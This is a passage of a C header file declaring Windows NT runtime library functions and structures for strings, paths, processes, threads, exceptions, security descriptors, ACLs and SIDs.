_In_ BOOLEAN CaseInSensitive);
NTSYSAPI
VOID
NTAPI
RtlCopyString(
_In_ PSTRING DestinationString,
_In_opt_ PSTRING SourceString);
NTSYSAPI
CHAR
NTAPI
RtlUpperChar(
_In_ CHAR Character);
NTSYSAPI
VOID
NTAPI
RtlUpperString(
_In_ PSTRING DestinationString,
_In_ PSTRING SourceString);
NTSYSAPI
LONG
NTAPI
RtlCompareAltitudes(
_In_ PCUNICODE_STRING Altitude1,
_In_ PCUNICODE_STRING Altitude2);
//
// preallocated heap-growable buffers
//
typedef struct _RTL_BUFFER {
PUCHAR Buffer;
PUCHAR StaticBuffer;
SIZE_T Size;
SIZE_T StaticSize;
SIZE_T ReservedForAllocatedSize; // for future doubling
PVOID ReservedForIMalloc; // for future pluggable growth
} RTL_BUFFER, *PRTL_BUFFER;
typedef struct _RTL_UNICODE_STRING_BUFFER {
UNICODE_STRING String;
RTL_BUFFER ByteBuffer;
UCHAR MinimumStaticBufferForTerminalNul[sizeof(WCHAR)];
} RTL_UNICODE_STRING_BUFFER, *PRTL_UNICODE_STRING_BUFFER;
//
// These are OUT Disposition values.
//
#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_AMBIGUOUS (0x00000001)
#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_UNC (0x00000002)
#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_DRIVE (0x00000003)
#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_ALREADY_DOS (0x00000004)
NTSYSAPI
NTSTATUS
NTAPI
RtlNtPathNameToDosPathName(
_In_ ULONG Flags,
_Inout_ PRTL_UNICODE_STRING_BUFFER Path,
_Out_opt_ PULONG Disposition,
_Inout_opt_ PWSTR* FilePart);
NTSYSAPI
ULONG
NTAPI
RtlIsDosDeviceName_U(
_In_ PCWSTR DosFileName);
NTSYSAPI
ULONG
NTAPI
RtlGetFullPathName_U(
_In_ PCWSTR lpFileName,
_In_ ULONG nBufferLength,
_Out_writes_bytes_(nBufferLength) PWSTR lpBuffer,
_Out_opt_ PWSTR *lpFilePart);
NTSYSAPI
NTSTATUS
NTAPI
RtlGetSearchPath(
_Out_ PWSTR *SearchPath);
typedef enum _RTL_PATH_TYPE {
RtlPathTypeUnknown, // 0
RtlPathTypeUncAbsolute, // 1
RtlPathTypeDriveAbsolute, // 2
RtlPathTypeDriveRelative, // 3
RtlPathTypeRooted, // 4
RtlPathTypeRelative, // 5
RtlPathTypeLocalDevice, // 6
RtlPathTypeRootLocalDevice // 7
} RTL_PATH_TYPE;
NTSYSAPI
RTL_PATH_TYPE
NTAPI
RtlDetermineDosPathNameType_U(
_In_ PCWSTR DosFileName);
#define HASH_STRING_ALGORITHM_DEFAULT (0)
#define HASH_STRING_ALGORITHM_X65599 (1)
#define HASH_STRING_ALGORITHM_INVALID (0xffffffff)
NTSYSAPI
NTSTATUS
NTAPI
RtlHashUnicodeString(
_In_ const UNICODE_STRING *String,
_In_ BOOLEAN CaseInSensitive,
_In_ ULONG HashAlgorithm,
_Out_ PULONG HashValue);
NTSYSAPI
NTSTATUS
NTAPI
RtlAppendUnicodeStringToString(
_In_ PUNICODE_STRING Destination,
_In_ PUNICODE_STRING Source);
NTSYSAPI
NTSTATUS
NTAPI
RtlAppendUnicodeToString(
_In_ PUNICODE_STRING Destination,
_In_opt_ PWSTR Source);
NTSYSAPI
VOID
NTAPI
RtlCopyUnicodeString(
_In_ PUNICODE_STRING DestinationString,
_In_ PUNICODE_STRING SourceString);
NTSYSAPI
NTSTATUS
NTAPI
RtlUpcaseUnicodeString(
_Inout_ PUNICODE_STRING DestinationString,
_In_ PUNICODE_STRING SourceString,
_In_ BOOLEAN AllocateDestinationString);
NTSYSAPI
NTSTATUS
NTAPI
RtlDowncaseUnicodeString(
_Inout_ PUNICODE_STRING DestinationString,
_In_ PUNICODE_STRING SourceString,
_In_ BOOLEAN AllocateDestinationString);
NTSYSAPI
VOID
NTAPI
RtlEraseUnicodeString(
_Inout_ PUNICODE_STRING String);
#define RTL_ENSURE_BUFFER_SIZE_NO_COPY (0x00000001)
NTSYSAPI
NTSTATUS
NTAPI
RtlpEnsureBufferSize(
_In_ ULONG Flags,
_Inout_ PRTL_BUFFER Buffer,
_In_ SIZE_T NewSizeBytes);
#define RtlInitBuffer(Buff, StatBuff, StatSize) \
do { \
(Buff)->Buffer = (StatBuff); \
(Buff)->Size = (StatSize); \
(Buff)->StaticBuffer = (StatBuff); \
(Buff)->StaticSize = (StatSize); \
} while (0)
#define RtlEnsureBufferSize(Flags, Buff, NewSizeBytes) \
( ((Buff) != NULL && (NewSizeBytes) <= (Buff)->Size) \
? STATUS_SUCCESS \
: RtlpEnsureBufferSize((Flags), (Buff), (NewSizeBytes)) \
)
#define RtlFreeBuffer(Buff) \
do { \
if ((Buff) != NULL && (Buff)->Buffer != NULL) { \
if (RTLP_BUFFER_IS_HEAP_ALLOCATED(Buff)) { \
UNICODE_STRING UnicodeString; \
UnicodeString.Buffer = (PWSTR)(PVOID)(Buff)->Buffer; \
RtlFreeUnicodeString(&UnicodeString); \
} \
(Buff)->Buffer = (Buff)->StaticBuffer; \
(Buff)->Size = (Buff)->StaticSize; \
} \
} while (0)
NTSYSAPI
VOID
NTAPI
RtlRunEncodeUnicodeString(
_Inout_ PUCHAR Seed,
_Inout_ PUNICODE_STRING String);
NTSYSAPI
VOID
NTAPI
RtlRunDecodeUnicodeString(
_In_ UCHAR Seed,
_Inout_ PUNICODE_STRING String);
/************************************************************************************
*
* RTL Integer conversion API.
*
************************************************************************************/
struct in6_addr;
NTSYSAPI
PWSTR
NTAPI
RtlIpv4AddressToStringW(
_In_ const struct in_addr *Addr,
_Out_ PWSTR S);
NTSYSAPI
NTSTATUS
NTAPI
RtlIpv4StringToAddressW(
_In_ PCWSTR AddressString,
_In_ BOOLEAN Strict,
_Out_ LPCWSTR *Terminator,
_Out_ struct in_addr *Address);
NTSYSAPI
PWSTR
NTAPI
RtlIpv6AddressToStringW(
_In_ struct in6_addr*Address,
_Out_writes_(46) PWSTR AddressString);
NTSYSAPI
NTSTATUS
NTAPI
RtlIpv6StringToAddressW(
_In_ PCWSTR AddressString,
_Out_ PCWSTR * Terminator,
_Out_ struct in6_addr*Address);
//taken from ph2
NTSYSAPI
NTSTATUS
NTAPI
RtlIntegerToChar(
_In_ ULONG Value,
_In_opt_ ULONG Base,
_In_ LONG OutputLength,
_Out_ PSTR String);
NTSYSAPI
NTSTATUS
NTAPI
RtlCharToInteger(
_In_ PSTR String,
_In_opt_ ULONG Base,
_Out_ PULONG Value);
NTSYSAPI
NTSTATUS
NTAPI
RtlLargeIntegerToChar(
_In_ PLARGE_INTEGER Value,
_In_opt_ ULONG Base,
_In_ LONG OutputLength,
_Out_ PSTR String);
NTSYSAPI
NTSTATUS
NTAPI
RtlIntegerToUnicodeString(
_In_ ULONG Value,
_In_opt_ ULONG Base,
_Inout_ PUNICODE_STRING String);
NTSYSAPI
NTSTATUS
NTAPI
RtlInt64ToUnicodeString(
_In_ ULONGLONG Value,
_In_opt_ ULONG Base,
_Inout_ PUNICODE_STRING String);
NTSYSAPI
NTSTATUS
NTAPI
RtlUnicodeStringToInteger(
_In_ PUNICODE_STRING String,
_In_opt_ ULONG Base,
_Out_ PULONG Value);
/************************************************************************************
*
* RTL Process/Thread API.
*
************************************************************************************/
typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)(
PRTL_USER_PROCESS_PARAMETERS ProcessParameters
);
typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)(
PVOID ThreadParameter
);
typedef struct _RTL_USER_PROCESS_INFORMATION {
ULONG Length;
HANDLE Process;
HANDLE Thread;
CLIENT_ID ClientId;
SECTION_IMAGE_INFORMATION ImageInformation;
} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;
//
// This structure is used only by Wow64 processes. The offsets
// of structure elements should the same as viewed by a native Win64 application.
//
typedef struct _RTL_USER_PROCESS_INFORMATION64 {
ULONG Length;
LONGLONG Process;
LONGLONG Thread;
CLIENT_ID64 ClientId;
SECTION_IMAGE_INFORMATION64 ImageInformation;
} RTL_USER_PROCESS_INFORMATION64, *PRTL_USER_PROCESS_INFORMATION64;
NTSYSAPI
NTSTATUS
STDAPIVCALLTYPE
RtlSetProcessIsCritical(
_In_ BOOLEAN NewValue,
_Out_opt_ PBOOLEAN OldValue,
_In_ BOOLEAN CheckFlag);
NTSYSAPI
NTSTATUS
STDAPIVCALLTYPE
RtlSetThreadIsCritical(
_In_ BOOLEAN NewValue,
_Out_opt_ PBOOLEAN OldValue,
_In_ BOOLEAN CheckFlag);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateEnvironment(
_In_ BOOLEAN CloneCurrentEnvironment,
_Out_ PVOID *Environment);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateEnvironmentEx(
_In_ PVOID SourceEnv,
_Out_ PVOID *Environment,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
RtlExpandEnvironmentStrings(
_In_opt_ PVOID Environment,
_In_reads_(SrcLength) PWSTR Src,
_In_ SIZE_T SrcLength,
_Out_writes_opt_(DstLength) PWSTR Dst,
_In_ SIZE_T DstLength,
_Out_opt_ PSIZE_T ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlExpandEnvironmentStrings_U(
_In_opt_ PVOID Environment,
_In_ PCUNICODE_STRING Source,
_Out_ PUNICODE_STRING Destination,
_Out_opt_ PULONG ReturnedLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlSetCurrentEnvironment(
_In_ PVOID Environment,
_Out_opt_ PVOID *PreviousEnvironment);
NTSYSAPI
NTSTATUS
NTAPI
RtlQueryEnvironmentVariable_U(
_In_opt_ PVOID Environment,
_In_ PUNICODE_STRING Name,
_Out_ PUNICODE_STRING Value);
NTSYSAPI
NTSTATUS
NTAPI
RtlSetEnvironmentVariable(
_Inout_opt_ PVOID* Environment,
_In_ PUNICODE_STRING Name,
_In_opt_ PUNICODE_STRING Value);
NTSYSAPI
NTSTATUS
NTAPI
RtlDestroyEnvironment(
_In_ PVOID Environment);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateProcessParameters(
_Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
_In_ PUNICODE_STRING ImagePathName,
_In_opt_ PUNICODE_STRING DllPath,
_In_opt_ PUNICODE_STRING CurrentDirectory,
_In_opt_ PUNICODE_STRING CommandLine,
_In_opt_ PVOID Environment,
_In_opt_ PUNICODE_STRING WindowTitle,
_In_opt_ PUNICODE_STRING DesktopInfo,
_In_opt_ PUNICODE_STRING ShellInfo,
_In_opt_ PUNICODE_STRING RuntimeData);
NTSYSAPI
NTSTATUS
NTAPI
RtlDestroyProcessParameters(
_In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateProcessParametersEx(
_Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
_In_ PUNICODE_STRING ImagePathName,
_In_opt_ PUNICODE_STRING DllPath,
_In_opt_ PUNICODE_STRING CurrentDirectory,
_In_opt_ PUNICODE_STRING CommandLine,
_In_opt_ PVOID Environment,
_In_opt_ PUNICODE_STRING WindowTitle,
_In_opt_ PUNICODE_STRING DesktopInfo,
_In_opt_ PUNICODE_STRING ShellInfo,
_In_opt_ PUNICODE_STRING RuntimeData,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateUserProcess(
_In_ PUNICODE_STRING NtImagePathName,
_In_ ULONG Attributes,
_In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
_In_opt_ PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
_In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
_In_opt_ HANDLE ParentProcess,
_In_ BOOLEAN InheritHandles,
_In_opt_ HANDLE DebugPort,
_In_opt_ HANDLE ExceptionPort,
_Out_ PRTL_USER_PROCESS_INFORMATION ProcessInformationn);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateUserThread(
_In_ HANDLE Process,
_In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
_In_ BOOLEAN CreateSuspended,
_In_ ULONG StackZeroBits,
_In_opt_ SIZE_T MaximumStackSize,
_In_opt_ SIZE_T InitialStackSize,
_In_ PUSER_THREAD_START_ROUTINE StartAddress,
_In_opt_ PVOID Parameter,
_Out_opt_ PHANDLE Thread,
_Out_opt_ PCLIENT_ID ClientId);
NTSYSAPI
VOID
NTAPI
RtlExitUserThread(
_In_ NTSTATUS ExitStatus);
NTSYSAPI
VOID
NTAPI
RtlExitUserProcess(
_In_ NTSTATUS ExitStatus);
NTSYSAPI
VOID
NTAPI
RtlFreeUserThreadStack(
_In_ HANDLE hProcess,
_In_ HANDLE hThread);
NTSYSAPI
VOID
NTAPI
RtlPushFrame(
_In_ PTEB_ACTIVE_FRAME Frame);
NTSYSAPI
VOID
NTAPI
RtlPopFrame(
_In_ PTEB_ACTIVE_FRAME Frame);
NTSYSAPI
PTEB_ACTIVE_FRAME
NTAPI
RtlGetFrame(
VOID);
NTSYSAPI
PVOID
NTAPI
RtlEncodePointer(
_In_ PVOID Ptr);
NTSYSAPI
PVOID
NTAPI
RtlDecodePointer(
_In_ PVOID Ptr);
/************************************************************************************
*
* RTL Memory Buffer API.
*
************************************************************************************/
NTSYSAPI
SIZE_T
NTAPI
RtlCompareMemoryUlong(
_In_ PVOID Source,
_In_ SIZE_T Length,
_In_ ULONG Pattern);
NTSYSAPI
VOID
NTAPI
RtlFillMemoryUlong(
_Out_ PVOID Destination,
_In_ SIZE_T Length,
_In_ ULONG Pattern);
NTSYSAPI
VOID
NTAPI
RtlFillMemoryUlonglong(
_Out_ PVOID Destination,
_In_ SIZE_T Length,
_In_ ULONGLONG Pattern);
/************************************************************************************
*
* RTL PEB API.
*
************************************************************************************/
NTSYSAPI
PPEB
NTAPI
RtlGetCurrentPeb(
VOID);
NTSYSAPI
VOID
NTAPI
RtlAcquirePebLock(
VOID);
NTSYSAPI
VOID
NTAPI
RtlReleasePebLock(
VOID);
/************************************************************************************
*
* RTL Exception Handling API.
*
************************************************************************************/
NTSYSAPI
PVOID
NTAPI
RtlAddVectoredExceptionHandler(
_In_ ULONG First,
_In_ PVECTORED_EXCEPTION_HANDLER Handler);
NTSYSAPI
ULONG
NTAPI
RtlRemoveVectoredExceptionHandler(
_In_ PVOID Handle);
NTSYSAPI
BOOLEAN
NTAPI
RtlDispatchException(
_In_ PEXCEPTION_RECORD ExceptionRecord,
_In_ PCONTEXT ContextRecord);
NTSYSAPI
PVOID
NTAPI
RtlAddVectoredContinueHandler(
_In_ ULONG First,
_In_ PVECTORED_EXCEPTION_HANDLER Handler);
NTSYSAPI
ULONG
NTAPI
RtlRemoveVectoredContinueHandler(
_In_ PVOID Handle);
NTSYSAPI
VOID
NTAPI
RtlRaiseException(
_In_ PEXCEPTION_RECORD ExceptionRecord);
NTSYSAPI
DECLSPEC_NORETURN
VOID
NTAPI
RtlRaiseStatus(
_In_ NTSTATUS Status);
NTSYSAPI
NTSTATUS
NTAPI
NtContinue(
_In_ PCONTEXT ContextRecord,
_In_ BOOLEAN TestAlert);
NTSYSAPI
NTSTATUS
NTAPI
NtRaiseException(
_In_ PEXCEPTION_RECORD ExceptionRecord,
_In_ PCONTEXT ContextRecord,
_In_ BOOLEAN FirstChance);
__analysis_noreturn
NTSYSAPI
VOID
NTAPI
RtlAssert(
_In_ PVOID VoidFailedAssertion,
_In_ PVOID VoidFileName,
_In_ ULONG LineNumber,
_In_opt_ PSTR MutableMessage);
#define RTL_ASSERT(exp) \
((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, NULL), FALSE) : TRUE)
#define RTL_ASSERTMSG(msg, exp) \
((!(exp)) ? (RtlAssert((PVOID)#exp, (PVOID)__FILE__, __LINE__, msg), FALSE) : TRUE)
#define RTL_SOFT_ASSERT(_exp) \
((!(_exp)) ? (DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n", __FILE__, __LINE__, #_exp), FALSE) : TRUE)
#define RTL_SOFT_ASSERTMSG(_msg, _exp) \
((!(_exp)) ? (DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n Message: %s\n", __FILE__, __LINE__, #_exp, (_msg)), FALSE) : TRUE)
typedef ULONG(NTAPI* PRTLP_UNHANDLED_EXCEPTION_FILTER)(
_In_ PEXCEPTION_POINTERS ExceptionInfo
);
NTSYSAPI
VOID
NTAPI
RtlSetUnhandledExceptionFilter(
_In_ PRTLP_UNHANDLED_EXCEPTION_FILTER UnhandledExceptionFilter);
NTSYSAPI
LONG
NTAPI
RtlUnhandledExceptionFilter(
_In_ PEXCEPTION_POINTERS ExceptionPointers);
/************************************************************************************
*
* RTL Security API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
RtlGetOwnerSecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_Out_ PSID *Owner,
_Out_ PBOOLEAN OwnerDefaulted);
NTSYSAPI
NTSTATUS
NTAPI
RtlGetGroupSecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_Out_ PSID *Group,
_Out_ PBOOLEAN GroupDefaulted);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateSecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_ ULONG Revision);
NTSYSAPI
NTSTATUS
NTAPI
RtlSetOwnerSecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_ PSID Owner,
_In_ BOOLEAN OwnerDefaulted);
NTSYSAPI
NTSTATUS
NTAPI
RtlCopySecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR InputSecurityDescriptor,
_Out_ PSECURITY_DESCRIPTOR* OutputSecurityDescriptor);
NTSYSAPI
NTSTATUS
NTAPI
RtlMakeSelfRelativeSD(
_In_ PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,
_Out_writes_bytes_(*BufferLength) PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,
_Inout_ PULONG BufferLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlAbsoluteToSelfRelativeSD(
_In_ PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,
_Out_writes_bytes_to_opt_(*BufferLength, *BufferLength) PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,
_Inout_ PULONG BufferLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlSelfRelativeToAbsoluteSD(
_In_ PSECURITY_DESCRIPTOR SelfRelativeSecurityDescriptor,
_Out_writes_bytes_to_opt_(*AbsoluteSecurityDescriptorSize, *AbsoluteSecurityDescriptorSize) PSECURITY_DESCRIPTOR AbsoluteSecurityDescriptor,
_Inout_ PULONG AbsoluteSecurityDescriptorSize,
_Out_writes_bytes_to_opt_(*DaclSize, *DaclSize) PACL Dacl,
_Inout_ PULONG DaclSize,
_Out_writes_bytes_to_opt_(*SaclSize, *SaclSize) PACL Sacl,
_Inout_ PULONG SaclSize,
_Out_writes_bytes_to_opt_(*OwnerSize, *OwnerSize) PSID Owner,
_Inout_ PULONG OwnerSize,
_Out_writes_bytes_to_opt_(*PrimaryGroupSize, *PrimaryGroupSize) PSID PrimaryGroup,
_Inout_ PULONG PrimaryGroupSize);
NTSYSAPI
NTSTATUS
NTAPI
RtlSetDaclSecurityDescriptor(
_Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_ BOOLEAN DaclPresent,
_In_opt_ PACL Dacl,
_In_ BOOLEAN DaclDefaulted);
NTSYSAPI
NTSTATUS
NTAPI
RtlGetDaclSecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_Out_ PBOOLEAN DaclPresent,
_Out_ PACL* Dacl,
_Out_ PBOOLEAN DaclDefaulted);
NTSYSAPI
NTSTATUS
NTAPI
RtlSetSaclSecurityDescriptor(
_Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_ BOOLEAN SaclPresent,
_In_opt_ PACL Sacl,
_In_ BOOLEAN SaclDefaulted);
NTSYSAPI
NTSTATUS
NTAPI
RtlGetSaclSecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_Out_ PBOOLEAN SaclPresent,
_Out_ PACL* Sacl,
_Out_ PBOOLEAN SaclDefaulted);
NTSYSAPI
ULONG
NTAPI
RtlLengthSecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor);
_Check_return_
NTSYSAPI
BOOLEAN
NTAPI
RtlValidSecurityDescriptor(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor);
_Check_return_
NTSYSAPI
BOOLEAN
NTAPI
RtlValidRelativeSecurityDescriptor(
_In_reads_bytes_(SecurityDescriptorLength) PSECURITY_DESCRIPTOR SecurityDescriptorInput,
_In_ ULONG SecurityDescriptorLength,
_In_ SECURITY_INFORMATION RequiredInformation);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateAcl(
_Out_writes_bytes_(AclLength) PACL Acl,
_In_ ULONG AclLength,
_In_ ULONG AclRevision);
NTSYSAPI
BOOLEAN
NTAPI
RtlValidAcl(
_In_ PACL Acl);
NTSYSAPI
NTSTATUS
NTAPI
RtlQueryInformationAcl(
_In_ PACL Acl,
_Out_writes_bytes_(AclInformationLength) PVOID AclInformation,
_In_ ULONG AclInformationLength,
_In_ ACL_INFORMATION_CLASS AclInformationClass);
NTSYSAPI
NTSTATUS
NTAPI
RtlSetInformationAcl(
_Inout_ PACL Acl,
_In_reads_bytes_(AclInformationLength) PVOID AclInformation,
_In_ ULONG AclInformationLength,
_In_ ACL_INFORMATION_CLASS AclInformationClass);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG StartingAceIndex,
_In_reads_bytes_(AceListLength) PVOID AceList,
_In_ ULONG AceListLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlDeleteAce(
_Inout_ PACL Acl,
_In_ ULONG AceIndex);
NTSYSAPI
NTSTATUS
NTAPI
RtlGetAce(
_In_ PACL Acl,
_In_ ULONG AceIndex,
_Outptr_ PVOID *Ace);
NTSYSAPI
BOOLEAN
NTAPI
RtlFirstFreeAce(
_In_ PACL Acl,
_Out_ PVOID *FirstFree);
NTSYSAPI
BOOLEAN
NTAPI
RtlOwnerAcesPresent(
_In_ PACL pAcl);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAccessAllowedAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ACCESS_MASK AccessMask,
_In_ PSID Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAccessAllowedAceEx(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG AceFlags,
_In_ ACCESS_MASK AccessMask,
_In_ PSID Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAccessDeniedAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ACCESS_MASK AccessMask,
_In_ PSID Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAccessDeniedAceEx(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG AceFlags,
_In_ ACCESS_MASK AccessMask,
_In_ PSID Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAuditAccessAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ACCESS_MASK AccessMask,
_In_ PSID Sid,
_In_ BOOLEAN AuditSuccess,
_In_ BOOLEAN AuditFailure);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAuditAccessAceEx(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG AceFlags,
_In_ ACCESS_MASK AccessMask,
_In_ PSID Sid,
_In_ BOOLEAN AuditSuccess,
_In_ BOOLEAN AuditFailure);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAccessAllowedObjectAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG AceFlags,
_In_ ACCESS_MASK AccessMask,
_In_opt_ GUID *ObjectTypeGuid,
_In_opt_ GUID *InheritedObjectTypeGuid,
_In_ PSID Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAccessDeniedObjectAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG AceFlags,
_In_ ACCESS_MASK AccessMask,
_In_opt_ GUID *ObjectTypeGuid,
_In_opt_ GUID *InheritedObjectTypeGuid,
_In_ PSID Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddAuditAccessObjectAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG AceFlags,
_In_ ACCESS_MASK AccessMask,
_In_opt_ GUID *ObjectTypeGuid,
_In_opt_ GUID *InheritedObjectTypeGuid,
_In_ PSID Sid,
_In_ BOOLEAN AuditSuccess,
_In_ BOOLEAN AuditFailure);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddCompoundAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ UCHAR AceType,
_In_ ACCESS_MASK AccessMask,
_In_ PSID ServerSid,
_In_ PSID ClientSid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddMandatoryAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG AceFlags,
_In_ PSID Sid,
_In_ UCHAR AceType,
_In_ ACCESS_MASK AccessMask);
NTSYSAPI
PVOID
NTAPI
RtlFindAceByType(
_In_ PACL pAcl,
_In_ UCHAR AceType,
_Out_opt_ PULONG pIndex);
NTSYSAPI
BOOLEAN
NTAPI
RtlOwnerAcesPresent(
_In_ PACL pAcl);
NTSYSAPI
NTSTATUS
NTAPI
RtlDefaultNpAcl(
_Out_ PACL* Acl);
NTSYSAPI
NTSTATUS
NTAPI
RtlAddProcessTrustLabelAce(
_Inout_ PACL Acl,
_In_ ULONG AceRevision,
_In_ ULONG AceFlags,
_In_ PSID ProcessTrustLabelSid,
_In_ UCHAR AceType,
_In_ ACCESS_MASK AccessMask);
NTSYSAPI
BOOLEAN
NTAPI
RtlValidSid(
_In_ PSID Sid);
NTSYSAPI
BOOLEAN
NTAPI
RtlEqualSid(
_In_ PSID Sid1,
_In_ PSID Sid2);
NTSYSAPI
BOOLEAN
NTAPI
RtlEqualPrefixSid(
_In_ PSID Sid1,
_In_ PSID Sid2);
NTSYSAPI
ULONG
NTAPI
RtlLengthRequiredSid(
_In_ ULONG SubAuthorityCount);
NTSYSAPI
PVOID
NTAPI
RtlFreeSid(
_In_ PSID Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlAllocateAndInitializeSid(
_In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
_In_ UCHAR SubAuthorityCount,
_In_ ULONG SubAuthority0,
_In_ ULONG SubAuthority1,
_In_ ULONG SubAuthority2,
_In_ ULONG SubAuthority3,
_In_ ULONG SubAuthority4,
_In_ ULONG SubAuthority5,
_In_ ULONG SubAuthority6,
_In_ ULONG SubAuthority7,
_Out_ PSID *Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlInitializeSid(
_Out_ PSID Sid,
_In_ PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
_In_ UCHAR SubAuthorityCount);
NTSYSAPI
PSID_IDENTIFIER_AUTHORITY
NTAPI
RtlIdentifierAuthoritySid(
_In_ PSID Sid);
NTSYSAPI
PULONG
NTAPI
RtlSubAuthoritySid(
_In_ PSID Sid,
_In_ ULONG SubAuthority);
NTSYSAPI
PUCHAR
NTAPI
RtlSubAuthorityCountSid(
_In_ PSID Sid);
NTSYSAPI
ULONG
NTAPI
RtlLengthSid(
_In_ PSID Sid);
NTSYSAPI
NTSTATUS
NTAPI
RtlCopySid(
_In_ ULONG DestinationSidLength,
_In_ PSID DestinationSid,
_In_ PSID SourceSid);
NTSYSAPI
NTSTATUS
NTAPI
RtlCopySidAndAttributesArray(
_In_ ULONG ArrayLength,
_In_ PSID_AND_ATTRIBUTES Source,
_In_ ULONG TargetSidBufferSize,
_Out_ PSID_AND_ATTRIBUTES TargetArrayElement,
_Out_ PSID TargetSid,
_Out_ PSID *NextTargetSid,
_Out_ PULONG RemainingTargetSidBufferSize);
NTSYSAPI
NTSTATUS
NTAPI
RtlLengthSidAsUnicodeString(
_In_ PSID Sid,
_Out_ PULONG StringLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlConvertSidToUnicodeString(
_In_ PUNICODE_STRING UnicodeString,
_In_ PSID Sid,
_In_ BOOLEAN AllocateDestinationString);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateServiceSid(
_In_ PUNICODE_STRING ServiceName,
_Out_writes_bytes_opt_(*ServiceSidLength) PSID ServiceSid,
_Inout_ PULONG ServiceSidLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlSidEqualLevel(
_In_ PSID Sid1,
_In_ PSID Sid2,
_Out_ PBOOLEAN EqualLevel);
NTSYSAPI
NTSTATUS
NTAPI
RtlSidIsHigherLevel(
_In_ PSID Sid1,
_In_ PSID Sid2,
_Out_ PBOOLEAN HigherLevel);
NTSYSAPI
NTSTATUS
NTAPI
RtlReplaceSidInSd(
_Inout_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_ PSID OldSid,
_In_ PSID NewSid,
_Out_ ULONG* NumChanges);
NTSYSAPI
BOOLEAN
NTAPI
RtlIsElevatedRid(
_In_ PSID_AND_ATTRIBUTES SidAttr);
FORCEINLINE
LUID
NTAPI
RtlConvertLongToLuid(
_In_ LONG Long
)
{
LUID TempLuid;
